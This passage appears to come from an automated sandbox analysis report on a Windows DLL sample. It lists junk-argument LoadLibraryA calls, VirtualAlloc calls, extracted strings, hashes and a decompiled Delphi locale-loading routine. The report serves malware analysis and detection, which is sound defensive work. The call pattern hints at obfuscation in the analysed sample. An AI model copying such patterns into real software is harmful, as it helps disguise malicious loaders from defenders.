LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B83C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B846
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B850
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B85A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B864
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B86E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B878
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B882
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B88C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B896
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8A0
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8AA
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8B4
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8BE
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8C8
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8D2
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8DC
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8E6
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8F0
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B8FA
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B904
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B90E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B918
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B922
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B92C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B936
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B940
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B94A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B954
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B95E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B968
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B972
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B97C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B986
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B990
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B99A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9A4
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9AE
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9B8
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9C2
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9CC
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9D6
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9E0
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9EA
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9F4
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B9FE
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA08
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA12
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA1C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA26
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA30
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA3A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA44
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA4E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA58
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA62
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA6C
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA76
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA80
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA8A
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA94
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA9E
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BAA8
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BAB2
LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BABC
LoadIconA.USER32(00000000,0000113C), ref: 0076BAC8
StrokePath.GDI32(0000000C), ref: 0076BAEB
VirtualAlloc.KERNELBASE(00000000,-0076FF10), ref: 0076BBBA
VirtualAlloc.KERNELBASE(00000000,-0076FF10), ref: 0076BBE9
StrokePath.GDI32(0000000C), ref: 0076BD1F
StrokePath.GDI32(0000000C), ref: 0076BD35
StrokePath.GDI32(0000000C), ref: 0076BD63
StrokePath.GDI32(0000000C), ref: 0076BD6F

Strings

pp, xrefs: 0076C1A4
fadfadfadad, xrefs: 0076BDF8, 0076B459, 0076B463, 0076B46D, 0076B477, 0076B481, 0076B48B, 0076B495, 0076B49F, 0076B4A9, 0076B4B3, 0076B4BD, 0076B4C7, 0076B4D1, 0076B4DB, 0076B4E5, 0076B4EF, 0076B4F9, 0076B503, 0076B50D, 0076B517, 0076B521, 0076B52B, 0076B535, 0076B53F, 0076B549, 0076B553, 0076B55D, 0076B567, 0076B571, 0076B57B, 0076B585, 0076B58F, 0076B599, 0076B5A3, 0076B5AD, 0076B5B7, 0076B5C1, 0076B5CB, 0076B5D5, 0076B5DF, 0076B5E9, 0076B5F3, 0076B5FD, 0076B607, 0076B611, 0076B61B, 0076B625, 0076B62F, 0076B639, 0076B643, 0076B64D, 0076B657, 0076B661, 0076B66B, 0076B675, 0076B67F, 0076B689, 0076B693, 0076B69D, 0076B6A7, 0076B6B1, 0076B6BB, 0076B6C5, 0076B6CF, 0076B6D9, 0076B6E3, 0076B6ED, 0076B6F7, 0076B701, 0076B70B, 0076B715, 0076B71F, 0076B729, 0076B733, 0076B73D, 0076B747, 0076B751, 0076B75B, 0076B765, 0076B76F, 0076B779, 0076B783, 0076B78D, 0076B797, 0076B7A1, 0076B7AB, 0076B7B5, 0076B7BF, 0076B7C9, 0076B7D3, 0076B7DD, 0076B7E7, 0076B7F1, 0076B7FB, 0076B805, 0076B80F, 0076B819, 0076B823, 0076B82D, 0076B837, 0076B841, 0076B84B, 0076B855, 0076B85F, 0076B869, 0076B873, 0076B87D, 0076B887, 0076B891, 0076B89B, 0076B8A5, 0076B8AF, 0076B8B9, 0076B8C3, 0076B8CD, 0076B8D7, 0076B8E1, 0076B8EB, 0076B8F5, 0076B8FF, 0076B909, 0076B913, 0076B91D, 0076B927, 0076B931, 0076B93B, 0076B945, 0076B94F, 0076B959, 0076B963, 0076B96D, 0076B977, 0076B981, 0076B98B, 0076B995, 0076B99F, 0076B9A9, 0076B9B3, 0076B9BD, 0076B9C7, 0076B9D1, 0076B9DB, 0076B9E5, 0076B9EF, 0076B9F9, 0076BA03, 0076BA0D, 0076BA17, 0076BA21, 0076BA2B, 0076BA35, 0076BA3F, 0076BA49, 0076BA53, 0076BA5D, 0076BA67, 0076BA71, 0076BA7B, 0076BA85, 0076BA8F, 0076BA99, 0076BAA3, 0076BAAD, 0076BAB7
)q, xrefs: 0076C01C
qp, xrefs: 0076C224
Tq, xrefs: 0076BB69
(ep, xrefs: 0076BB91, 0076BBBA, 0076BBE9

Memory Dump Source

Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd

Similarity

API ID: Load$Library$PathStroke$AllocVirtual$Icon
String ID: (ep$)q$fadfadfadad$pp$qp$Tq
API String ID: 140743564-3941014712
Opcode ID: 73a1c4a0d0a2fe4dba764d39ffd4632cde6d97720ea9884f5434a6bbe118f757
Instruction ID: 3024a1931c53d7d90b5b76919f5fbd46bd1a289e456f8357a46eae1555401427
Opcode Fuzzy Hash: 73a1c4a0d0a2fe4dba764d39ffd4632cde6d97720ea9884f5434a6bbe118f757
Instruction Fuzzy Hash: 487251B028C7C1DFC302B7BA9C2A9543BA85E537023189196FC92DE1E7C79E65958733

Uniqueness

Uniqueness Score: -1.00%

Function 0070557C Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0070557C(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x705681);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					_t8 =  &_v289; // 0xc085fee2
					E007053C4(_t8, 0x105);
					_t9 =  &_v28; // 0xc085ffe7
					_t10 =  &_v22; // 0xc085ffed
					_t11 =  &_v289; // 0xc085fee2
					if(RegQueryValueExA(_v12, _t11, 0, 0, _t10, _t9) != 0) {
						_t13 =  &_v28; // 0xc085ffe7
						_t14 =  &_v22; // 0xc085ffed
						if(RegQueryValueExA(_v12, E007057E8, 0, 0, _t14, _t13) != 0) {
							_v22 = 0;
						}
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00705688);
					return RegCloseKey(_v12);
				} else {
					_t5 =  &_v12; // 0xc085fff7
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019, _t5); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t6 =  &_v12; // 0xc085fff7
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019, _t6); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L007012A4();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L007012AC();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L007012A4();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L007012A4();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L007012A4();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

0x0070557d
0x0070557f
0x00705587
0x00705598
0x0070559d
0x007055b6
0x007055bd
0x007055ff
0x00705601
0x00705602
0x00705607
0x0070560a
0x0070560d
0x00705614
0x0070561f
0x00705624
0x00705628
0x00705630
0x00705642
0x00705644
0x00705648
0x00705660
0x00705662
0x00705662
0x00705660
0x00705666
0x0070566c
0x0070566f
0x00705672
0x00705680
0x007055bf
0x007055bf
0x007055d4
0x007055db
0x00000000
0x007055dd
0x007055dd
0x007055f2
0x007055f9
0x00705688
0x00705690
0x00705697
0x00705698
0x007056ab
0x007056b0
0x007056b9
0x007056cf
0x007056d5
0x007056d6
0x007056e3
0x007056e8
0x007056e7
0x007056e7
0x007056f7
0x007056ff
0x00705705
0x0070570a
0x00705717
0x0070571b
0x0070571c
0x0070571d
0x00705732
0x00705732
0x00705736
0x0070574f
0x00705753
0x00705754
0x00705755
0x00705765
0x0070576a
0x0070576e
0x00705770
0x00705785
0x00705789
0x0070578a
0x0070578b
0x0070579b
0x007057a0
0x007057a0
0x0070576e
0x00705736
0x007056ff
0x007057a9
0x00000000
0x00000000
0x00000000
0x007055f9
0x007055db

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,0076C0A4), ref: 00705598
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055B6
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,0076C0A4), ref: 007055D4
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 007055F2
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0070563B
RegQueryValueExA.ADVAPI32(?,007057E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00705681,?,80000001), ref: 00705659
RegCloseKey.ADVAPI32(?,00705688,00000000,?,?,00000000,00705681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0070567B
